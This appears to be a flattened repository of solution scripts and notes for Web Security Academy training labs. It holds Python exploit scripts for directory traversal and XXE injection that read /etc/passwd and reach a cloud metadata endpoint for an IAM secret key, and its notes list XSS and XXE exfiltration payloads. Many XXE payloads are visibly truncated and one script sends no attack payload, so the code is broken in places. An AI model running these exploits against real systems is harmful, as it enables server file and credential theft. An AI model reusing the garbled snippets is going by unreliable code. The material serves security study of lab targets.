'/image?filename=%25%32%65%25%32%65%25%32%66%25%32%65%25%32%65%25%32%66%25%32%65%25%32%65%25%32%66%25%32%65%25%32%65%25%32%66%25%36%35%25%37%34%25%36%33%25%32%66%25%37%30%25%36%31%25%37%33%25%37%33%25%37%37%25%36%34' 11 | 12 | r = requests.get(image_url, verify=False, proxies=proxies) 13 | if 'root:x' in r.text: 14 | print('(+) Exploit successful!') 15 | print('(+) The following is the content of the /etc/passwd file:') 16 | print(r.text) 17 | else: 18 | print('(-) Exploit failed.') 19 | sys.exit(-1) 20 | 21 | def main(): 22 | if len(sys.argv) !=2: 23 | print("(+) Usage: %s " % sys.argv[0]) 24 | print("(+) Example: %s www.example.com" % sys.argv[0]) 25 | sys.exit(-1) 26 | 27 | url = sys.argv[1] 28 | print("(+) Exploiting the directory traversal vulnerability...") 29 | directory_traversal_exploit(url) 30 | 31 | if __name__ == "__main__": 32 | main() -------------------------------------------------------------------------------- /directory-traversal/lab-04/notes.txt: -------------------------------------------------------------------------------- 1 | Lab #4 - File path traversal, traversal sequences stripped with superfluous URL-decode 2 | 3 | Target Goal - Retrieve the contents of the /etc/passwd file. 4 | 5 | Analysis: 6 | 7 | ../ -------------------------------------------------------------------------------- /directory-traversal/lab-05/directory-traversal-lab-05.py: -------------------------------------------------------------------------------- 1 | import sys 2 | import requests 3 | import urllib3 4 | 5 | urllib3.disable_warnings(urllib3.exceptions.InsecureRequestWarning) 6 | 7 | proxies = {'http': 'http://127.0.0.1:8080', 'https': 'http://127.0.0.1:8080'} 8 | 9 | def directory_traversal_exploit(url): 10 | image_url = url + '/image?filename=/var/www/images/../../../etc/passwd' 11 | r = requests.get(image_url, verify=False, proxies=proxies) 12 | if 'root:x' in r.text: 13 | print('(+) Exploit successful!') 14 | print('(+) The following is the content of the /etc/passwd file:') 15 | print(r.text) 16 | else: 17 | print('(-) Exploit failed.') 18 | sys.exit(-1) 19 | 20 | def main(): 21 | if len(sys.argv) !=2: 22 | print("(+) Usage: %s " % sys.argv[0]) 23 | print("(+) Example: %s www.example.com" % sys.argv[0]) 24 | sys.exit(-1) 25 | 26 | url = sys.argv[1] 27 | print("(+) Exploiting directory traversal vulnerability...") 28 | directory_traversal_exploit(url) 29 | 30 | 31 | if __name__ == "__main__": 32 | main() -------------------------------------------------------------------------------- /directory-traversal/lab-05/notes.txt: -------------------------------------------------------------------------------- 1 | Lab #5 - File path traversal, validation of start of path 2 | 3 | Target Goal - Retrieve the contents of the /etc/passwd file. 4 | 5 | Analysis: 6 | 7 | /var/www/images/67.jpg -------------------------------------------------------------------------------- /directory-traversal/lab-06/directory-traversal-lab-06.py: -------------------------------------------------------------------------------- 1 | import sys 2 | import requests 3 | import urllib3 4 | urllib3.disable_warnings(urllib3.exceptions.InsecureRequestWarning) 5 | 6 | proxies = {'http': 'http://127.0.0.1:8080', 'https': 'http://127.0.0.1:8080'} 7 | 8 | def directory_traversal_exploit(url): 9 | image_url = url + '/image?filename=../../../etc/passwd%0048.jpg' 10 | r = requests.get(image_url, verify=False, proxies=proxies) 11 | if 'root:x' in r.text: 12 | print('(+) Exploit successful!') 13 | print('(+) The following is the content of the /etc/passwd file:') 14 | print(r.text) 15 | else: 16 | print('(-) Exploit failed.') 17 | sys.exit(-1) 18 | 19 | def main(): 20 | if len(sys.argv) != 2: 21 | print("(+) Usage: %s " % sys.argv[0]) 22 | print("(+) Example: %s www.example.com" % sys.argv[0]) 23 | sys.exit(-1) 24 | 25 | url = sys.argv[1] 26 | print("(+) Exploiting the directory traversal vulnerability...") 27 | directory_traversal_exploit(url) 28 | 29 | if __name__ == "__main__": 30 | main() -------------------------------------------------------------------------------- /directory-traversal/lab-06/notes.txt: -------------------------------------------------------------------------------- 1 | Lab #6 - File path traversal, validation of file extension with null byte bypass 2 | 3 | Target Goal - Retrieve the contents of the /etc/passwd file. 4 | 5 | Analysis: 6 | -------------------------------------------------------------------------------- /directory-traversal/theory/Directory Traversal Complete Guide Theory Video Slides.pdf: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/rkhal101/Web-Security-Academy-Series/ad800b5dc2649815692b90b892dee474f82701f8/directory-traversal/theory/Directory Traversal Complete Guide Theory Video Slides.pdf -------------------------------------------------------------------------------- /dom-based-vulnerabilities/lab-01/notes.txt: -------------------------------------------------------------------------------- 1 | Lab #1 - DOM XSS using web messages 2 | 3 | Target Goal - Exploit DOM based XSS vulnerability to call the print() function. 4 | 5 | 6 | Analysis: 7 | 8 | -------------------------------------------------------------------------------- /xss/lab-18/notes.txt: -------------------------------------------------------------------------------- 1 | Lab #18 - Reflected XSS into HTML context with all tags blocked except custom ones 2 | 3 | Target Goal - Perform an XSS attack that alerts on document.cookie. 4 | 5 | Analysis: 6 | 7 | -------------------------------------------------------------------------------- /xss/lab-19/notes.txt: -------------------------------------------------------------------------------- 1 | Lab #19 - Reflected XSS with some SVG markup allowed 2 | 3 | Target Goal - Perform an XSS attack that calls the alert function. 4 | 5 | Analysis: 6 | -------------------------------------------------------------------------------- /xss/lab-20/notes.txt: -------------------------------------------------------------------------------- 1 | Lab #20 - Reflected XSS in canonical link tag 2 | 3 | Target Goal - Perform an XSS attack on the homepage that injects an attribute that calls the alert function. 4 | 5 | Analysis: 6 | 7 | 8 | -------------------------------------------------------------------------------- /xss/lab-21/notes.txt: -------------------------------------------------------------------------------- 1 | Lab #21 - Reflected XSS into a JavaScript string with single quote and backslash escaped 2 | 3 | Target Goal - Perform an XSS attack that calls the alert function. 4 | 5 | Analysis: 6 | 7 | 8 | -------------------------------------------------------------------------------- /xss/lab-22/notes.txt: -------------------------------------------------------------------------------- 1 | Lab #22 - Reflected XSS into a JavaScript string with angle brackets and double quotes HTML-encoded and single quotes escaped 2 | 3 | Target Goal - Perform an XSS attack that calls the alert function. 4 | 5 | Analysis: 6 | 7 | test\'; alert(1);// -------------------------------------------------------------------------------- /xss/lab-23/notes.txt: -------------------------------------------------------------------------------- 1 | Lab #23 - Stored XSS into onclick event with angle brackets and double quotes HTML-encoded and single quotes and backslash escaped 2 | 3 | Target Goal - Perform an XSS attack that calls the alert function when the comment author name is clicked. 4 | 5 | Analysis: 6 | 7 | onclick="var tracker={track(){}};tracker.track('http://www.test.ca'-alert(1)-'');"> 8 | 9 | 10 | http://www.test.ca'-alert(1)-' -------------------------------------------------------------------------------- /xss/lab-24/notes.txt: -------------------------------------------------------------------------------- 1 | Lab #24 - Reflected XSS into a template literal with angle brackets, single, double quotes, backslash and backticks Unicode-escaped 2 | 3 | Target Goal - Exploit XSS vulnerability and call the alert function. 4 | 5 | Analysis: 6 | 7 | 8 | ${alert(1)} -------------------------------------------------------------------------------- /xss/theory/XSS Complete Guide Theory Video Slides.pdf: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/rkhal101/Web-Security-Academy-Series/ad800b5dc2649815692b90b892dee474f82701f8/xss/theory/XSS Complete Guide Theory Video Slides.pdf -------------------------------------------------------------------------------- /xxe-injection/lab-01/notes.txt: -------------------------------------------------------------------------------- 1 | Lab 1 - Exploiting XXE using external entities to retrieve files 2 | 3 | Target Goal - Exploit XXE injection to retrieve the contents of the /etc/passwd file. 4 | 5 | Analysis: 6 | 7 | -------------------------------------------------------------------------------- /xxe-injection/lab-01/xxe-injection-lab-01.py: -------------------------------------------------------------------------------- 1 | import requests 2 | import sys 3 | import urllib3 4 | 5 | urllib3.disable_warnings(urllib3.exceptions.InsecureRequestWarning) 6 | 7 | proxies = {'http': 'http://127.0.0.1:8080', 'https': 'http://127.0.0.1:8080'} 8 | 9 | def exploit_xxe(s, url): 10 | 11 | print("(+) Exploiting XXE Injection...") 12 | stock_url = url + '/product/stock' 13 | data_stock = ']>&xxe;1' 14 | r = s.post(stock_url, data=data_stock, verify=False, proxies=proxies) 15 | print("(+) The following is the content of the /etc/passwd file: ") 16 | print(r.text) 17 | 18 | def main(): 19 | if len(sys.argv) !=2: 20 | print("(+) Usage: %s " % sys.argv[0]) 21 | print("(+) Example: %s www.example.com" % sys.argv[0]) 22 | sys.exit(-1) 23 | 24 | s = requests.Session() 25 | url = sys.argv[1] 26 | exploit_xxe(s, url) 27 | 28 | if __name__ == "__main__": 29 | main() -------------------------------------------------------------------------------- /xxe-injection/lab-02/notes.txt: -------------------------------------------------------------------------------- 1 | Lab 2 - Exploiting XXE to perform SSRF attacks 2 | 3 | Target Goal - Exploit the XXE vulnerability to perform an SSRF attack and obtain the server's IAM secret access key 4 | 5 | Analysis: 6 | 7 | 8 | http://169.254.169.254/ -------------------------------------------------------------------------------- /xxe-injection/lab-02/xxe-injection-lab-02.py: -------------------------------------------------------------------------------- 1 | import requests 2 | import sys 3 | import urllib3 4 | 5 | urllib3.disable_warnings(urllib3.exceptions.InsecureRequestWarning) 6 | 7 | proxies = {'http': 'http://127.0.0.1:8080', 'https': 'http://127.0.0.1:8080'} 8 | 9 | def exploit_xxe(s, url): 10 | 11 | print("(+) Exploiting XXE Injection...") 12 | stock_url = url + "/product/stock" 13 | data_stock = ']>&xxe;1' 14 | r = s.post(stock_url, data=data_stock, verify=False, proxies=proxies) 15 | print("(+) The following is the content of the secret file: ") 16 | print(r.text) 17 | 18 | def main(): 19 | if len(sys.argv) !=2: 20 | print("(+) Usage: %s " % sys.argv[0]) 21 | print("(+) Example: %s www.example.com" % sys.argv[0]) 22 | sys.exit(-1) 23 | 24 | s = requests.Session() 25 | url = sys.argv[1] 26 | exploit_xxe(s, url) 27 | 28 | if __name__ == "__main__": 29 | main() -------------------------------------------------------------------------------- /xxe-injection/lab-03/notes.txt: -------------------------------------------------------------------------------- 1 | Lab 3 - Blind XXE with out-of-band interaction 2 | 3 | Target Goal - Exploit the blind XXE vulnerability and perform a DNS lookup and HTTP request to Burp Collaborator. 4 | 5 | Analysis: -------------------------------------------------------------------------------- /xxe-injection/lab-04/notes.txt: -------------------------------------------------------------------------------- 1 | Lab 4 - Blind XXE with out-of-band interaction via XML parameter entities 2 | 3 | Target Goal - Exploit blind XXE injection to issue a DNS lookup and HTTP request to Burp Collaborator. 4 | 5 | Analysis: 6 | -------------------------------------------------------------------------------- /xxe-injection/lab-05/notes.txt: -------------------------------------------------------------------------------- 1 | Lab 5 - Exploiting blind XXE to exfiltrate data using a malicious external DTD 2 | 3 | Target Goal - Exploit XXE injection to exfiltrate the content of the /etc/hostname file. 4 | 5 | Analysis: 6 | 7 | 8 | Burp Collaborator 9 | ------------------ 10 | 11 | 12 | "> 13 | %eval; 14 | %exfil; 15 | 16 | Without Burp Collaborator 17 | ------------------------- 18 | 19 | 20 | "> 21 | %eval; 22 | %exfil; -------------------------------------------------------------------------------- /xxe-injection/lab-06/notes.txt: -------------------------------------------------------------------------------- 1 | Lab 6 - Exploiting blind XXE to retrieve data via error messages 2 | 3 | Target Goal - Exploit blind XXE injection to to trigger an error message that displays the content of the /etc/passwd file. 4 | 5 | 6 | Doesn't require BURP Collaborator 7 | 8 | 9 | Analysis: 10 | 11 | Regular Entity: 12 | -------------- 13 | 14 | ]> 15 | 16 | Parameter Entity: 17 | ----------------- 18 | 19 | %xxe;]> 20 | 21 | Exfiltration of Data: 22 | --------------------- 23 | 24 | 25 | "> 26 | %eval; 27 | %exfil; -------------------------------------------------------------------------------- /xxe-injection/lab-07/notes.txt: -------------------------------------------------------------------------------- 1 | Lab 7 - Exploiting XInclude to retrieve files 2 | 3 | Target Goal - Exploit XXE injection to retrieve the content of the /etc/passwd 4 | 5 | Analysis: 6 | 7 | 8 | -------------------------------------------------------------------------------- /xxe-injection/lab-07/xxe-injection-lab-07.py: -------------------------------------------------------------------------------- 1 | import requests 2 | import sys 3 | import urllib3 4 | 5 | urllib3.disable_warnings(urllib3.exceptions.InsecureRequestWarning) 6 | 7 | proxies = {'http': 'http://127.0.0.1:8080', 'https': 'http://127.0.0.1:8080' 8 | } 9 | 10 | def exploit_xxe(s, url): 11 | 12 | print("(+) Exploiting XXE Injection...") 13 | stock_url = url + "/product/stock" 14 | data_stock = {'productId': '1', 'storeId': '1'} 15 | r = s.post(stock_url, data=data_stock, verify=False, proxies=proxies) 16 | print("(+) The following is the content of the /etc/passwd file:") 17 | print(r.text) 18 | 19 | 20 | def main(): 21 | if len(sys.argv) != 2: 22 | print("(+) Usage: %s " % sys.argv[0]) 23 | print("(+) Example: %s www.example.com" % sys.argv[0]) 24 | sys.exit(-1) 25 | 26 | s = requests.Session() 27 | url = sys.argv[1] 28 | exploit_xxe(s, url) 29 | 30 | if __name__ == "__main__": 31 | main() -------------------------------------------------------------------------------- /xxe-injection/lab-08/notes.txt: -------------------------------------------------------------------------------- 1 | Lab 8 - Exploiting XXE via image file upload 2 | 3 | Target Goal - Exploit XXE injection in the file upload functionality to display the content of the /etc/hostname file. 4 | 5 | Analysis: 6 | 7 | ]>&xxe; 8 | 9 | f466152c1a55 -------------------------------------------------------------------------------- /xxe-injection/lab-08/test.svg: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/rkhal101/Web-Security-Academy-Series/ad800b5dc2649815692b90b892dee474f82701f8/xxe-injection/lab-08/test.svg -------------------------------------------------------------------------------- /xxe-injection/lab-08/xxe-injection-lab-08.py: -------------------------------------------------------------------------------- 1 | import requests 2 | import sys 3 | import urllib3 4 | from bs4 import BeautifulSoup 5 | import random, string 6 | from requests_toolbelt import MultipartEncoder 7 | 8 | urllib3.disable_warnings(urllib3.exceptions.InsecureRequestWarning) 9 | 10 | proxies = {'http': 'http://127.0.0.1:8080', 'https': 'http://127.0.0.1:8080'} 11 | 12 | def get_csrf_token(s, url): 13 | r = s.get(url, verify=False, proxies=proxies) 14 | soup = BeautifulSoup(r.text, 'html.parser') 15 | csrf = soup.find("input", {"name": "csrf"})['value'] 16 | return csrf 17 | 18 | 19 | def exploit_xxe(s, url): 20 | 21 | # Get CSRF token 22 | post_url = url + "/post?postId=1" 23 | csrf_token = get_csrf_token(s, post_url) 24 | 25 | print("(+) Exploiting XXE injection...") 26 | comment_url = url + "/post/comment" 27 | params = {"csrf": csrf_token, 28 | "postId": "1", 29 | "comment": "test", 30 | "name": "test", 31 | "avatar": ('test.svg', ']>&xxe;', 'image/svg+xml'), 32 | "email": "test@test.ca", 33 | "website": "http://www.test.ca"} 34 | 35 | boundary = '------WebKitFormBoundary' + ''.join(random.sample(string.ascii_letters + string.digits, 16)) 36 | m = MultipartEncoder(fields=params, boundary=boundary) 37 | 38 | headers = {'Content-Type': m.content_type} 39 | 40 | r = s.post(comment_url, data=m, headers=headers, verify=False, proxies=proxies) 41 | 42 | def main(): 43 | if len(sys.argv) !=2: 44 | print("(+) Usage: %s " % sys.argv[0]) 45 | print("(+) Example: %s www.example.com" % sys.argv[0]) 46 | sys.exit(-1) 47 | 48 | s = requests.Session() 49 | url = sys.argv[1] 50 | exploit_xxe(s, url) 51 | 52 | 53 | if __name__ == "__main__": 54 | main() -------------------------------------------------------------------------------- /xxe-injection/lab-09/notes.txt: -------------------------------------------------------------------------------- 1 | Lab #9 - Exploiting XXE to retrieve data by repurposing a local DTD 2 | 3 | Target Goal - Exploit the XXE injection to trigger an error message containing the contents of the /etc/passwd file. 4 | 5 | Analysis: 6 | 7 | Regular entity: 8 | -------------- 9 | 10 | ]> 11 | 12 | Blind Regular entity: 13 | --------------------- 14 | 15 | ]> 16 | 17 | Parameter entity: 18 | ---------------- 19 | 20 | %xxe;]> 21 | 22 | Repurposing a Local DTD 23 | ----------------------- 24 | 25 | %xxe;]> 26 | 27 | 28 | 30 | 31 | 33 | "> 34 | %eval; 35 | %error; 36 | '> 37 | 38 | %local_dtd; 39 | ]> 40 | 41 | -------------------------------------------------------------------------------- /xxe-injection/lab-09/xxe-injection-lab-09.py: -------------------------------------------------------------------------------- 1 | import requests 2 | import sys 3 | import urllib3 4 | 5 | urllib3.disable_warnings(urllib3.exceptions.InsecureRequestWarning) 6 | 7 | proxies = {'http': 'http://127.0.0.1:8080', 'https': 'http://127.0.0.1:8080'} 8 | 9 | def exploit_xxe(s, url): 10 | 11 | print("(+) Exploiting XXE Injection...") 12 | stock_url = url + "/product/stock" 13 | data_stock = ''' 16 | "> 17 | %eval; 18 | %error; 19 | '>%local_dtd;]>11''' 20 | 21 | r = s.post(stock_url, data=data_stock, verify=False, proxies=proxies) 22 | print("(+) The following is the content of the /etc/passwd file: ") 23 | print(r.text) 24 | 25 | def main(): 26 | if len(sys.argv) != 2: 27 | print("(+) Usage: %s " % sys.argv[0]) 28 | print("(+) Example: %s www.example.com" % sys.argv[0]) 29 | sys.exit(-1) 30 | 31 | s = requests.Session() 32 | url = sys.argv[1] 33 | exploit_xxe(s, url) 34 | 35 | if __name__ == "__main__": 36 | main() -------------------------------------------------------------------------------- /xxe-injection/theory/XXE Injection Complete Guide Theory Video Slides.pdf: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/rkhal101/Web-Security-Academy-Series/ad800b5dc2649815692b90b892dee474f82701f8/xxe-injection/theory/XXE Injection Complete Guide Theory Video Slides.pdf --------------------------------------------------------------------------------